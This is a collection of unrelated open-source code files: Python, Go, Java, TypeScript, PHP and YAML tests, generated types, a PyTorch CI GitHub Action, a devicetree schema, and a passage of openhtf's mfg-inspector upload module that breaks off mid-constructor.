        rbm_64.intercept_visible_, rbm_32.intercept_visible_, rtol=1e-05, atol=0
    )
    assert_allclose(rbm_64.components_, rbm_32.components_, rtol=1e-03, atol=0)
    assert_allclose(rbm_64.h_samples_, rbm_32.h_samples_)
@pytest.mark.parametrize("method", ["fit", "partial_fit"])
def test_feature_names_out(method):
    """Check `get_feature_names_out` for `BernoulliRBM`."""
    n_components = 10
    model = BernoulliRBM(n_components=n_components)
    getattr(model, method)(Xdigits)
    expected = [f"bernoullirbm{i}" for i in range(n_components)]
    assert_array_equal(expected, model.get_feature_names_out())
// Code generated - EDITING IS FUTILE. DO NOT EDIT.
package v0alpha1
// NOTE(review): generated code (see file header) — regenerate from the
// source schema instead of editing these definitions by hand.

// +k8s:openapi-gen=true
type DummystatusOperatorState struct {
	// lastEvaluation is the ResourceVersion last evaluated
	LastEvaluation string `json:"lastEvaluation"`
	// state describes the state of the lastEvaluation.
	// It is limited to three possible states for machine evaluation.
	State DummyStatusOperatorStateState `json:"state"`
	// descriptiveState is an optional more descriptive state field which has no requirements on format
	DescriptiveState *string `json:"descriptiveState,omitempty"`
	// details contains any extra information that is operator-specific
	Details map[string]interface{} `json:"details,omitempty"`
}

// NewDummystatusOperatorState creates a new DummystatusOperatorState object.
func NewDummystatusOperatorState() *DummystatusOperatorState {
	return &DummystatusOperatorState{}
}

// OpenAPIModelName returns the OpenAPI model name for DummystatusOperatorState.
func (DummystatusOperatorState) OpenAPIModelName() string {
	return "com.github.grafana.grafana.apps.alerting.historian.pkg.apis.alertinghistorian.v0alpha1.DummystatusOperatorState"
}
// NOTE(review): generated code (see file header) — do not hand-edit.

// +k8s:openapi-gen=true
type DummyStatus struct {
	// operatorStates is a map of operator ID to operator state evaluations.
	// Any operator which consumes this kind SHOULD add its state evaluation information to this field.
	OperatorStates map[string]DummystatusOperatorState `json:"operatorStates,omitempty"`
	// additionalFields is reserved for future use
	AdditionalFields map[string]interface{} `json:"additionalFields,omitempty"`
}

// NewDummyStatus creates a new DummyStatus object.
func NewDummyStatus() *DummyStatus {
	return &DummyStatus{}
}

// OpenAPIModelName returns the OpenAPI model name for DummyStatus.
func (DummyStatus) OpenAPIModelName() string {
	return "com.github.grafana.grafana.apps.alerting.historian.pkg.apis.alertinghistorian.v0alpha1.DummyStatus"
}
// NOTE(review): generated code (see file header) — do not hand-edit.

// +k8s:openapi-gen=true
type DummyStatusOperatorStateState string

// Allowed machine-readable evaluation states for an operator.
const (
	DummyStatusOperatorStateStateSuccess    DummyStatusOperatorStateState = "success"
	DummyStatusOperatorStateStateInProgress DummyStatusOperatorStateState = "in_progress"
	DummyStatusOperatorStateStateFailed     DummyStatusOperatorStateState = "failed"
)

// OpenAPIModelName returns the OpenAPI model name for DummyStatusOperatorStateState.
func (DummyStatusOperatorStateState) OpenAPIModelName() string {
	return "com.github.grafana.grafana.apps.alerting.historian.pkg.apis.alertinghistorian.v0alpha1.DummyStatusOperatorStateState"
}
/*
* Copyright (C) 2012 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.hash;
import static com.google.common.hash.Hashing.ChecksumType.ADLER_32;
import static com.google.common.hash.Hashing.ChecksumType.CRC_32;
import java.util.zip.Checksum;
import junit.framework.TestCase;
import org.jspecify.annotations.NullUnmarked;
/**
* Tests for ChecksumHashFunction.
*
* @author Colin Decker
*/
@NullUnmarked
public class ChecksumHashFunctionTest extends TestCase {
public void testCrc32_equalsChecksumValue() throws Exception {
assertChecksum(CRC_32, "");
assertChecksum(CRC_32, "Z");
assertChecksum(CRC_32, "foobar");
}
public void testAdler32_equalsChecksumValue() throws Exception {
assertChecksum(ADLER_32, "");
assertChecksum(ADLER_32, "Z");
assertChecksum(ADLER_32, "foobar");
}
public void testCrc32_knownValues() throws Exception {
assertHash32(0x1C8600E3, CRC_32, "hell");
assertHash32(0x3610A686, CRC_32, "hello");
assertHash32(0xED81F9F6, CRC_32, "hello ");
assertHash32(0x4850DDC2, CRC_32, "hello w");
assertHash32(0x7A2D6005, CRC_32, "hello wo");
assertHash32(0x1C192672, CRC_32, "hello wor");
assertHash32(0x414FA339, CRC_32, "The quick brown fox jumps over the lazy dog");
assertHash32(0x4400B5BC, CRC_32, "The quick brown fox jumps over the lazy cog");
}
public void testAdler32_knownValues() throws Exception {
assertHash32(0x041701A6, ADLER_32, "hell");
assertHash32(0x062C0215, ADLER_32, "hello");
assertHash32(0x08610235, ADLER_32, "hello ");
assertHash32(0x0B0D02AC, ADLER_32, "hello w");
assertHash32(0x0E28031B, ADLER_32, "hello wo");
assertHash32(0x11B5038D, ADLER_32, "hello wor");
assertHash32(0x5BDC0FDA, ADLER_32, "The quick brown fox jumps over the lazy dog");
assertHash32(0x5BD90FD9, ADLER_32, "The quick brown fox jumps over the lazy cog");
}
private static void assertChecksum(ImmutableSupplier<Checksum> supplier, String input) {
byte[] bytes = HashTestUtils.ascii(input);
Checksum checksum = supplier.get();
checksum.update(bytes, 0, bytes.length);
long value = checksum.getValue();
String toString = "name";
HashFunction func = new ChecksumHashFunction(supplier, 32, toString);
assertEquals(toString, func.toString());
assertEquals(value, func.hashBytes(bytes).padToLong());
}
private static void assertHash32(
int expected, ImmutableSupplier<Checksum> supplier, String input) {
byte[] bytes = HashTestUtils.ascii(input);
String toString = "name";
HashFunction func = new ChecksumHashFunction(supplier, 32, toString);
assertEquals(expected, func.hashBytes(bytes).asInt());
assertEquals(toString, func.toString());
}
} | java | github | https://github.com/google/guava | android/guava-tests/test/com/google/common/hash/ChecksumHashFunctionTest.java |
from __future__ import unicode_literals
from django.db import models
def check_test_runner():
    """Warn when the project relies on the (changed) default test runner.

    Django 1.6 switched the default ``TEST_RUNNER`` to ``DiscoverRunner``.
    If the user explicitly overrode the setting we presume they know what
    they are doing and return ``None`` (no warning).
    """
    from django.conf import settings

    new_default = 'django.test.runner.DiscoverRunner'
    if getattr(settings, 'TEST_RUNNER', new_default) != new_default:
        return None
    return ' '.join([
        "Django 1.6 introduced a new default test runner ('%s')" % new_default,
        "You should ensure your tests are all running & behaving as expected. See",
        "https://docs.djangoproject.com/en/dev/releases/1.6/#new-test-runner",
        "for more information.",
    ])
def check_boolean_field_default_value():
    """Warn about ``BooleanField``s declared without an explicit default.

    Django 1.6 changed the implicit default of ``BooleanField`` from
    ``False`` to ``Null``; lists every affected field, or returns ``None``
    when there are none.
    """
    offenders = []
    for model in models.get_models():
        opts = model._meta
        offenders.extend(
            '%s.%s: "%s"' % (opts.app_label, opts.object_name, field.name)
            for field in opts.local_fields
            if isinstance(field, models.BooleanField) and not field.has_default()
        )
    if not offenders:
        return None
    return ' '.join([
        "You have not set a default value for one or more BooleanFields:",
        "%s." % ", ".join(offenders),
        "In Django 1.6 the default value of BooleanField was changed from",
        "False to Null when Field.default isn't defined. See",
        "https://docs.djangoproject.com/en/1.6/ref/models/fields/#booleanfield",
        "for more information.",
    ])
def run_checks():
    """Collect warning messages from every check relevant to this release.

    Required by the ``check`` management command; ``None``/empty results
    are filtered out.
    """
    all_checks = (check_test_runner, check_boolean_field_default_value)
    return [message for message in (check() for check in all_checks) if message]
//// [tests/cases/conformance/es6/computedProperties/computedPropertyNames2_ES5.ts] ////
// NOTE(review): auto-generated TypeScript compiler test baseline (input .ts
// followed by emitted .js) — regenerate via the compiler test harness rather
// than editing by hand.

//// [computedPropertyNames2_ES5.ts]
var methodName = "method";
var accessorName = "accessor";
class C {
    [methodName]() { }
    static [methodName]() { }
    get [accessorName]() { }
    set [accessorName](v) { }
    static get [accessorName]() { }
    static set [accessorName](v) { }
}

//// [computedPropertyNames2_ES5.js]
"use strict";
var methodName = "method";
var accessorName = "accessor";
class C {
    [methodName]() { }
    static [methodName]() { }
    get [accessorName]() { }
    set [accessorName](v) { }
    static get [accessorName]() { }
    static set [accessorName](v) { }
}
#!/usr/bin/env python
import roslib; #roslib.load_manifest('smach_tutorials')
import rospy
import smach
import smach_ros
# define state Foo
# define state Foo
class Foo(smach.State):
    """Example state: yields 'outcome1' ten times, then 'outcome2'."""

    def __init__(self):
        smach.State.__init__(self, outcomes=['outcome1', 'outcome2'])
        self.counter = 0

    def execute(self, userdata):
        rospy.loginfo('Executing state FOO')
        rospy.sleep(1)
        if self.counter >= 10:
            return 'outcome2'
        self.counter += 1
        return 'outcome1'
# define state Bar
class Bar(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['outcome2'])
def execute(self, userdata):
rospy.loginfo('Executing state BAR')
rospy.sleep(1)
return 'outcome2'
# main
def main():
rospy.init_node('smach_example_state_machine')
# Create a SMACH state machine
sm = smach.StateMachine(outcomes=['outcome4', 'outcome5'])
# Open the container
with sm:
# Add states to the container
smach.StateMachine.add('FOO', Foo(),
transitions={'outcome1':'BAR',
'outcome2':'outcome4'})
smach.StateMachine.add('BAR', Bar(),
transitions={'outcome2':'FOO'})
# Create and start the introspection server
sis = smach_ros.IntrospectionServer('server_name', sm, '/SM_ROOT')
sis.start()
# Execute SMACH plan
outcome = sm.execute()
# Wait for ctrl-c to stop the application
print "Test FSM done, waiting until ctrl+c is hit..."
rospy.spin()
sis.stop()
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
name: linux-test
inputs:
build-environment:
required: true
type: string
description: Top-level label for what's being built/tested.
test-matrix:
required: true
type: string
description: JSON description of what test configs to run.
docker-image:
required: true
type: string
description: Docker image to run in.
sync-tag:
required: false
type: string
default: ""
description: |
If this is set, our linter will use this to make sure that every other
job with the same `sync-tag` is identical.
use-gha:
required: false
type: string
default: ""
description: If set to any value, upload to GHA. Otherwise upload to S3.
dashboard-tag:
required: false
type: string
default: ""
s3-bucket:
description: S3 bucket to download artifact
required: false
type: string
default: "gha-artifacts"
aws-role-to-assume:
description: role to assume for downloading artifacts
required: false
type: string
default: ""
HUGGING_FACE_HUB_TOKEN:
description: |
HF Auth token to avoid rate limits when downloading models or datasets from hub
required: false
default: ""
GITHUB_TOKEN:
description: GitHub token
required: true
disable-monitor:
description: |
[Experimental] Disable utilization monitoring for tests.
Currently, by default we disable the monitor job and only look for specific tests,
since we are investigating the behaviour of the monitor script with different tests.
required: false
type: boolean
default: true
#env:
# GIT_DEFAULT_BRANCH: ${{ inputs.default_branch }}
runs:
using: composite
steps:
- name: Setup Linux
uses: ./.github/actions/setup-linux
- name: Login to ECR
uses: ./.github/actions/ecr-login
with:
aws-role-to-assume: ${{ inputs.aws-role-to-assume }}
- name: Calculate docker image
id: calculate-docker-image
uses: pytorch/test-infra/.github/actions/calculate-docker-image@main
with:
docker-image-name: ${{ inputs.docker-image }}
- name: Use following to pull public copy of the image
id: print-ghcr-mirror
env:
ECR_DOCKER_IMAGE: ${{ steps.calculate-docker-image.outputs.docker-image }}
shell: bash
run: |
tag=${ECR_DOCKER_IMAGE##*/}
echo "docker pull ghcr.io/pytorch/ci-image:${tag/:/-}"
- name: Pull docker image
uses: pytorch/test-infra/.github/actions/pull-docker-image@main
with:
docker-image: ${{ steps.calculate-docker-image.outputs.docker-image }}
- name: Check if in a container runner
shell: bash
id: check_container_runner
run: echo "IN_CONTAINER_RUNNER=$(if [ -f /.inarc ] || [ -f /.incontainer ]; then echo true ; else echo false; fi)" >> "$GITHUB_OUTPUT"
- name: Install nvidia driver, nvidia-docker runtime, set GPU_FLAG
id: install-nvidia-driver
uses: pytorch/test-infra/.github/actions/setup-nvidia@main
if: ${{ contains(inputs.build-environment, 'cuda') && !contains(matrix.config, 'nogpu') && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'false' }}
- name: Setup GPU_FLAG for docker run
id: setup-gpu-flag
run: echo "GPU_FLAG=--gpus all -e NVIDIA_DRIVER_CAPABILITIES=all" >> "${GITHUB_ENV}"
if: ${{ contains(inputs.build-environment, 'cuda') && !contains(matrix.config, 'nogpu') && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'true' }}
- name: Setup SCCACHE_SERVER_PORT environment for docker run when on container
id: setup-sscache-port-flag
run: echo "SCCACHE_SERVER_PORT_DOCKER_FLAG=-e SCCACHE_SERVER_PORT=$((RUNNER_UID + 4226))" >> "${GITHUB_ENV}"
if: ${{ steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'true' }}
- name: Lock NVIDIA A100 40GB Frequency
shell: bash
run: |
sudo nvidia-smi -pm 1
sudo nvidia-smi -ac 1215,1410
nvidia-smi
if: ${{ contains(matrix.runner, 'a100') && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'false' }}
- name: Start monitoring script
id: monitor-script
if: ${{ !inputs.disable-monitor }}
shell: bash
continue-on-error: true
run: |
python3 -m pip install psutil==5.9.8 nvidia-ml-py==11.525.84
python3 -m tools.stats.monitor > usage_log.txt 2>&1 &
echo "monitor-script-pid=${!}" >> "${GITHUB_OUTPUT}"
- name: Download build artifacts
uses: ./.github/actions/download-build-artifacts
with:
name: ${{ inputs.build-environment }}
s3-bucket: ${{ inputs.s3-bucket }}
- name: Download TD artifacts
continue-on-error: true
uses: ./.github/actions/download-td-artifacts
- name: Parse ref
id: parse-ref
shell: bash
run: .github/scripts/parse_ref.py
- name: Get workflow job id
id: get-job-id
uses: ./.github/actions/get-workflow-job-id
if: always()
with:
github-token: ${{ inputs.GITHUB_TOKEN }}
- name: Check for keep-going label and re-enabled test issues
# This uses the filter-test-configs action because it conveniently
# checks for labels and re-enabled test issues. It does not actually do
# any filtering. All filtering is done in the build step.
id: keep-going
uses: ./.github/actions/filter-test-configs
with:
github-token: ${{ inputs.GITHUB_TOKEN }}
test-matrix: ${{ inputs.test-matrix }}
job-name: ${{ steps.get-job-id.outputs.job-name }}
- name: Test
id: test
env:
BUILD_ENVIRONMENT: ${{ inputs.build-environment }}
PR_NUMBER: ${{ github.event.pull_request.number }}
GITHUB_REPOSITORY: ${{ github.repository }}
GITHUB_WORKFLOW: ${{ github.workflow }}
GITHUB_JOB: ${{ github.job }}
GITHUB_RUN_ID: ${{ github.run_id }}
GITHUB_RUN_NUMBER: ${{ github.run_number }}
GITHUB_RUN_ATTEMPT: ${{ github.run_attempt }}
JOB_ID: ${{ steps.get-job-id.outputs.job-id }}
JOB_NAME: ${{ steps.get-job-id.outputs.job-name }}
BRANCH: ${{ steps.parse-ref.outputs.branch }}
SHA1: ${{ github.event.pull_request.head.sha || github.sha }}
BASE_SHA: ${{ github.event.pull_request.base.sha || github.sha }}
TEST_CONFIG: ${{ matrix.config }}
SHARD_NUMBER: ${{ matrix.shard }}
NUM_TEST_SHARDS: ${{ matrix.num_shards }}
REENABLED_ISSUES: ${{ steps.keep-going.outputs.reenabled-issues }}
CONTINUE_THROUGH_ERROR: ${{ steps.keep-going.outputs.keep-going }}
VERBOSE_TEST_LOGS: ${{ steps.keep-going.outputs.ci-verbose-test-logs }}
TEST_SHOWLOCALS: ${{ steps.keep-going.outputs.ci-test-showlocals }}
NO_TEST_TIMEOUT: ${{ steps.keep-going.outputs.ci-no-test-timeout }}
NO_TD: ${{ steps.keep-going.outputs.ci-no-td }}
TD_DISTRIBUTED: ${{ steps.keep-going.outputs.ci-td-distributed }}
SCCACHE_BUCKET: ossci-compiler-cache-circleci-v2
SCCACHE_REGION: us-east-1
SCCACHE_S3_KEY_PREFIX: ${{ github.workflow }}
SHM_SIZE: ${{ contains(inputs.build-environment, 'cuda') && '2g' || '1g' }}
DOCKER_IMAGE: ${{ inputs.docker-image }}
XLA_CUDA: ${{ contains(inputs.build-environment, 'xla') && '0' || '' }}
XLA_CLANG_CACHE_S3_BUCKET_NAME: ossci-compiler-clang-cache-circleci-xla
PYTORCH_TEST_CUDA_MEM_LEAK_CHECK: ${{ matrix.mem_leak_check && '1' || '0' }}
PYTORCH_TEST_RERUN_DISABLED_TESTS: ${{ matrix.rerun_disabled_tests && '1' || '0' }}
DASHBOARD_TAG: ${{ inputs.dashboard-tag }}
HUGGING_FACE_HUB_TOKEN: ${{ inputs.HUGGING_FACE_HUB_TOKEN }}
SCRIBE_GRAPHQL_ACCESS_TOKEN: ${{ secrets.SCRIBE_GRAPHQL_ACCESS_TOKEN }}
IS_A100_RUNNER: ${{ contains(matrix.runner, 'a100') && '1' || '0' }}
shell: bash
run: |
set -x
if [[ $TEST_CONFIG == 'multigpu' ]]; then
TEST_COMMAND=.ci/pytorch/multigpu-test.sh
elif [[ $BUILD_ENVIRONMENT == *onnx* ]]; then
TEST_COMMAND=.ci/onnx/test.sh
else
TEST_COMMAND=.ci/pytorch/test.sh
fi
# detached container should get cleaned up by teardown_ec2_linux
# TODO: Stop building test binaries as part of the build phase
# Used for GPU_FLAG since that doesn't play nice
# shellcheck disable=SC2086,SC2090
container_name=$(docker run \
${GPU_FLAG:-} \
${SCCACHE_SERVER_PORT_DOCKER_FLAG:-} \
-e BUILD_ENVIRONMENT \
-e PR_NUMBER \
-e GITHUB_ACTIONS \
-e GITHUB_REPOSITORY \
-e GITHUB_WORKFLOW \
-e GITHUB_JOB \
-e GITHUB_RUN_ID \
-e GITHUB_RUN_NUMBER \
-e GITHUB_RUN_ATTEMPT \
-e JOB_ID \
-e JOB_NAME \
-e BASE_SHA \
-e BRANCH \
-e SHA1 \
-e AWS_DEFAULT_REGION \
-e IN_WHEEL_TEST \
-e SHARD_NUMBER \
-e TEST_CONFIG \
-e NUM_TEST_SHARDS \
-e REENABLED_ISSUES \
-e CONTINUE_THROUGH_ERROR \
-e VERBOSE_TEST_LOGS \
-e NO_TEST_TIMEOUT \
-e NO_TD \
-e TD_DISTRIBUTED \
-e PR_LABELS \
-e MAX_JOBS="$(nproc --ignore=2)" \
-e SCCACHE_BUCKET \
-e SCCACHE_REGION \
-e SCCACHE_S3_KEY_PREFIX \
-e XLA_CUDA \
-e XLA_CLANG_CACHE_S3_BUCKET_NAME \
-e PYTORCH_TEST_CUDA_MEM_LEAK_CHECK \
-e PYTORCH_TEST_RERUN_DISABLED_TESTS \
-e SKIP_SCCACHE_INITIALIZATION=1 \
-e HUGGING_FACE_HUB_TOKEN \
-e SCRIBE_GRAPHQL_ACCESS_TOKEN \
-e DASHBOARD_TAG \
-e IS_A100_RUNNER \
--env-file="/tmp/github_env_${GITHUB_RUN_ID}" \
--security-opt seccomp=unconfined \
--cap-add=SYS_PTRACE \
--ipc=host \
--shm-size="${SHM_SIZE}" \
--tty \
--detach \
--name="${container_name}" \
--user jenkins \
-v "${GITHUB_WORKSPACE}:/var/lib/jenkins/workspace" \
-w /var/lib/jenkins/workspace \
"${DOCKER_IMAGE}"
)
echo "DOCKER_CONTAINER_ID=${container_name}" >> "${GITHUB_ENV}"
docker exec -t "${container_name}" sh -c "pip install $(echo dist/*.whl)[opt-einsum] && ${TEST_COMMAND}"
- name: Upload pytest cache if tests failed
uses: ./.github/actions/pytest-cache-upload
continue-on-error: true
if: failure() && steps.test.conclusion && steps.test.conclusion == 'failure'
with:
cache_dir: .pytest_cache
shard: ${{ matrix.shard }}
sha: ${{ github.event.pull_request.head.sha || github.sha }}
test_config: ${{ matrix.config }}
job_identifier: ${{ github.workflow }}_${{ inputs.build-environment }}
- name: Print remaining test logs
shell: bash
if: always() && steps.test.conclusion
run: |
cat test/**/*_toprint.log || true
- name: Stop monitoring script
if: ${{ always() && steps.monitor-script.outputs.monitor-script-pid }}
shell: bash
continue-on-error: true
env:
MONITOR_SCRIPT_PID: ${{ steps.monitor-script.outputs.monitor-script-pid }}
run: |
kill "$MONITOR_SCRIPT_PID"
- name: Upload test artifacts
uses: ./.github/actions/upload-test-artifacts
if: always() && steps.test.conclusion && steps.test.conclusion != 'skipped'
with:
file-suffix: ${{ github.job }}-${{ matrix.config }}-${{ matrix.shard }}-${{ matrix.num_shards }}-${{ matrix.runner }}_${{ steps.get-job-id.outputs.job-id }}
use-gha: ${{ inputs.use-gha }}
s3-bucket: ${{ inputs.s3-bucket }}
- name: Collect backtraces from coredumps (if any)
if: always()
shell: bash
run: |
# shellcheck disable=SC2156
find . -iname "core.[1-9]*" -exec docker exec "${DOCKER_CONTAINER_ID}" sh -c "gdb python {} -ex 'bt' -ex 'q'" \;
- name: Store Core dumps on S3
uses: seemethere/upload-artifact-s3@v5
if: failure()
with:
name: coredumps-${{ matrix.config }}-${{ matrix.shard }}-${{ matrix.num_shards }}-${{ matrix.runner }}
retention-days: 14
if-no-files-found: ignore
path: ./**/core.[1-9]*
- name: Teardown Linux
uses: pytorch/test-infra/.github/actions/teardown-linux@main
if: always() && steps.check_container_runner.outputs.IN_CONTAINER_RUNNER == 'false'
# NB: We are currently having an intermittent GPU-related issue on G5 runners with
# A10G GPU. Once this happens, trying to reset the GPU as done in setup-nvidia does
# not seem to help. Here are some symptoms:
# * Calling nvidia-smi timeouts after 60 second
# * Fail to run nvidia-smi with an unable to determine the device handle for GPU
# unknown error
# * Test fails with a missing CUDA GPU error when initializing CUDA in PyTorch
# * Run docker --gpus all fails with error response from daemon
#
# As both the root cause and recovery path are unclear, let's take the runner out of
# service so that it doesn't get any more jobs
- name: Check NVIDIA driver installation step
if: failure() && steps.install-nvidia-driver.outcome && steps.install-nvidia-driver.outcome != 'skipped'
shell: bash
env:
RUNNER_WORKSPACE: ${{ runner.workspace }}
run: |
set +e
set -x
nvidia-smi
# NB: Surprisingly, nvidia-smi command returns successfully with return code 0 even in
# the case where the driver has already crashed as it still can get the driver version
# and some basic information like the bus ID. However, the rest of the information
# would be missing (ERR!), for example:
#
# +-----------------------------------------------------------------------------+
# | NVIDIA-SMI 525.89.02 Driver Version: 525.89.02 CUDA Version: 12.0 |
# |-------------------------------+----------------------+----------------------+
# | GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
# | Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
# | | | MIG M. |
# |===============================+======================+======================|
# | 0 ERR! Off | 00000000:00:1E.0 Off | ERR! |
# |ERR! ERR! ERR! ERR! / ERR! | 4184MiB / 23028MiB | ERR! Default |
# | | | ERR! |
# +-------------------------------+----------------------+----------------------+
#
# +-----------------------------------------------------------------------------+
# | Processes: |
# | GPU GI CI PID Type Process name GPU Memory |
# | ID ID Usage |
# |=============================================================================|
# +-----------------------------------------------------------------------------+
#
# This should be reported as a failure instead as it will guarantee to fail when
# Docker tries to run with --gpus all
#
# So, the correct check here is to query one of the missing piece of info like
# GPU name, so that the command can fail accordingly
nvidia-smi --query-gpu=gpu_name --format=csv,noheader --id=0
NVIDIA_SMI_STATUS=$?
# These are acceptable return code from nvidia-smi as copied from setup-nvidia GitHub action
if [ "$NVIDIA_SMI_STATUS" -ne 0 ] && [ "$NVIDIA_SMI_STATUS" -ne 14 ]; then
echo "NVIDIA driver installation has failed, shutting down the runner..."
.github/scripts/stop_runner_service.sh
fi
# For runner with multiple GPUs, we also want to confirm that the number of GPUs are the
# power of 2, i.e. 1, 2, 4, or 8. This is to avoid flaky test issue when one GPU fails
# https://github.com/pytorch/test-infra/issues/4000
GPU_COUNT=$(nvidia-smi --list-gpus | wc -l)
NVIDIA_SMI_STATUS=$?
# These are acceptable return code from nvidia-smi as copied from setup-nvidia GitHub action
if [ "$NVIDIA_SMI_STATUS" -ne 0 ] && [ "$NVIDIA_SMI_STATUS" -ne 14 ]; then
echo "NVIDIA driver installation has failed, shutting down the runner..."
.github/scripts/stop_runner_service.sh
fi
# Check the GPU count to be a power of 2
if [ "$GPU_COUNT" -le 8 ] && [ "$GPU_COUNT" -ne 1 ] && [ "$GPU_COUNT" -ne 2 ] && [ "$GPU_COUNT" -ne 4 ] && [ "$GPU_COUNT" -ne 8 ]; then
echo "NVIDIA driver detects $GPU_COUNT GPUs. The runner has a broken GPU, shutting it down..."
.github/scripts/stop_runner_service.sh
fi | unknown | github | https://github.com/pytorch/pytorch | .github/actions/linux-test/action.yml |
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Bundle\FrameworkBundle\DependencyInjection\Compiler;
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Definition;
use Symfony\Component\DependencyInjection\Reference;
class AssetsContextPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container): void
{
if (!$container->hasDefinition('assets.context')) {
return;
}
if (!$container->hasDefinition('router.request_context')) {
$container->setParameter('asset.request_context.base_path', $container->getParameter('asset.request_context.base_path') ?? '');
$container->setParameter('asset.request_context.secure', $container->getParameter('asset.request_context.secure') ?? false);
return;
}
$context = $container->getDefinition('assets.context');
if (null === $container->getParameter('asset.request_context.base_path')) {
$context->replaceArgument(1, (new Definition('string'))->setFactory([new Reference('router.request_context'), 'getBaseUrl']));
}
if (null === $container->getParameter('asset.request_context.secure')) {
$context->replaceArgument(2, (new Definition('bool'))->setFactory([new Reference('router.request_context'), 'isSecure']));
}
}
} | php | github | https://github.com/symfony/symfony | src/Symfony/Bundle/FrameworkBundle/DependencyInjection/Compiler/AssetsContextPass.php |
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/gpio/abilis,tb10x-gpio.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Abilis TB10x GPIO controller
maintainers:
- Christian Ruppert <christian.ruppert@abilis.com>
properties:
compatible:
const: abilis,tb10x-gpio
reg:
maxItems: 1
gpio-controller: true
'#gpio-cells':
const: 2
gpio-ranges: true
gpio-ranges-group-names: true
interrupt-controller: true
'#interrupt-cells':
const: 1
description: Interrupts are triggered on both edges
interrupts:
maxItems: 1
abilis,ngpio:
description: Number of GPIO pins this driver controls
$ref: /schemas/types.yaml#/definitions/uint32
required:
- compatible
- reg
- gpio-controller
- '#gpio-cells'
- abilis,ngpio
additionalProperties: false
examples:
- |
gpio@ff140000 {
compatible = "abilis,tb10x-gpio";
interrupt-controller;
#interrupt-cells = <1>;
interrupts = <27 2>;
reg = <0xff140000 0x1000>;
gpio-controller;
#gpio-cells = <2>;
abilis,ngpio = <3>;
gpio-ranges = <&iomux 0 0 0>;
gpio-ranges-group-names = "gpioa_pins";
}; | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/gpio/abilis,tb10x-gpio.yaml |
"""Output and/or upload a TestRun or MfgEvent proto for mfg-inspector.com.
"""
import json
import logging
import threading
import time
import zlib
import httplib2
import oauth2client.client
from openhtf.output import callbacks
from openhtf.output.proto import test_runs_converter
from openhtf.output.proto import guzzle_pb2
class UploadFailedError(Exception):
"""Raised when an upload to mfg-inspector fails."""
class InvalidTestRunError(Exception):
"""Raised if test run is invalid."""
def _send_mfg_inspector_request(envelope_data, credentials, destination_url):
"""Send upload http request. Intended to be run in retry loop."""
logging.info('Uploading result...')
http = httplib2.Http()
if credentials.access_token_expired:
credentials.refresh(http)
credentials.authorize(http)
resp, content = http.request(destination_url, 'POST', envelope_data)
try:
result = json.loads(content)
except Exception:
logging.debug('Upload failed with response %s: %s', resp, content)
raise UploadFailedError(resp, content)
if resp.status != 200:
logging.debug('Upload failed: %s', result)
raise UploadFailedError(result['error'], result)
return result
def send_mfg_inspector_data(inspector_proto, credentials, destination_url):
"""Upload MfgEvent to steam_engine."""
envelope = guzzle_pb2.TestRunEnvelope()
envelope.payload = zlib.compress(inspector_proto.SerializeToString())
envelope.payload_type = guzzle_pb2.COMPRESSED_MFG_EVENT
envelope_data = envelope.SerializeToString()
for _ in xrange(5):
try:
result = _send_mfg_inspector_request(
envelope_data, credentials, destination_url)
return result
except UploadFailedError:
time.sleep(1)
logging.critical(
'Could not upload to mfg-inspector after 5 attempts. Giving up.')
return {}
class _MemStorage(oauth2client.client.Storage):
# pylint: disable=invalid-name
"""Helper Storage class that keeps credentials in memory."""
def __init__(self):
self._lock = threading.Lock()
self._credentials = None
def acquire_lock(self):
self._lock.acquire(True)
def release_lock(self):
self._lock.release()
def locked_get(self):
return self._credentials
def locked_put(self, credentials):
self._credentials = credentials
class MfgInspector(object):
"""Interface to convert a TestRun to a mfg-inspector compatible proto.
Instances of this class are typically used to create callbacks that are
compatible with the OpenHTF output callbacks.
Typical usage:
interface = mfg_inspector.MfgInspector.from_json().set_converter(
my_custom_converter)
my_tester.add_output_callbacks(interface.save_to_disk(), interface.upload())
**Important** the conversion of the TestRecord to protofbuf as specified in
the _converter callable attribute only occurs once and the resulting protobuf
is cached in memory on the instance.
The upload callback will upload to mfg-inspector.com using the given
username and authentication key (which should be the key data itself, not a
filename or file).
In typical productin setups, we *first* save the protobuf to disk then attempt
to upload the protobuf to mfg-inspector. In the event of a network outage,
the result of the test run is available on disk and a separate process can
retry the upload when network is available.
"""
TOKEN_URI = 'https://accounts.google.com/o/oauth2/token'
SCOPE_CODE_URI = 'https://www.googleapis.com/auth/glass.infra.quantum_upload'
DESTINATION_URL = ('https://clients2.google.com/factoryfactory/'
'uploads/quantum_upload/?json')
# These attributes control format of callback and what actions are undertaken
# when called. These should either be set by a subclass or via configure.
# _converter is a callable that can be set either via set_converter method
# or by defining a _converter @staticmethod on subclasses.
_converter = None
# A default filename pattern can be specified on subclasses for use when
# saving to disk via save_to_disk.
_default_filename_pattern = None
def __init__(self, user=None, keydata=None,
token_uri=TOKEN_URI, destination_url=DESTINATION_URL):
self.user = user
self.keydata = keydata
self.token_uri = token_uri
self.destination_url = destination_url
if user and keydata:
self.credentials = oauth2client.client.SignedJwtAssertionCredentials(
